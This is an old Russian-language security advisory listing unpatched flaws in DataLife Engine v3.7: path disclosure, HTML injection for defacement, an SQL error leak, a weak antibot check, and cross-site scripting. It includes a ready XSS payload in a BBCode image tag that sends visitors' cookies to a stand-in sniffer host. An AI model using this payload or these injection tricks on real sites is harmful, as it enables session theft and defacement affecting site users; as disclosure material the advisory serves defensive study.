advisory DATALIFE engine

------------------------------------------------
/\
\/ DataLife Engine v.3.7 SoftNews Media Group advisory

Программный продукт : DataLife Engine v.3.7 SoftNews Media Group
Текущее состояние : UNPATCHED
Найдена : LTK
Дата написания : 29nd March, 2006
Тестировалось : ;)

Детали :

[Раскрытие установочного пути]

В parse.class.php выделено 12582912 байт на проверку сообщения.
Переполнение делается так: "<<><><><><><>>"

[Управление генерированием страниц]

На некоторых системах удалось выполнять простые html теги :
<br></td><plaintext></td><hr><form><input>
Что может сказаться на внешнем виде сайта, ака deface по быстрому.

[ХСС]

Угнать кукисы можно при помощи вставки картинки.
[img][/img] – этим можно воспользваться всегда, даже если нету таких кнопок при
добавлении новости, личном сообщении, добавления коментария.
Непосредственно сама ХСС:

[IMG=left]http://anyimage.com/ok.gif&quot; onmouseover='document.location="http://your.sniffer.com/sniff/sniff.gif?id=&quot;+document.cookie;&#39;&gt;&lt;!--[/IMG]

Если установлен форум, то куки приходят и от него.

[Проблемы с SQL]
http://target.net/category/topic/ – где topic – это не существующая тема.
Результат: SELECT id FROM nws_category WHERE parentid=not detected ;
Может, народные умельцы, в скором времени, что и придумают. :р

[antibot]
antibot.php не справляеться со своей задачей, при одновременном коннетке
он выдаёт одинаковые картинки.

[Greets ]
OrkzRule

/\ [email protected] ICQ: 200-255-251
\/
------------------------------------------------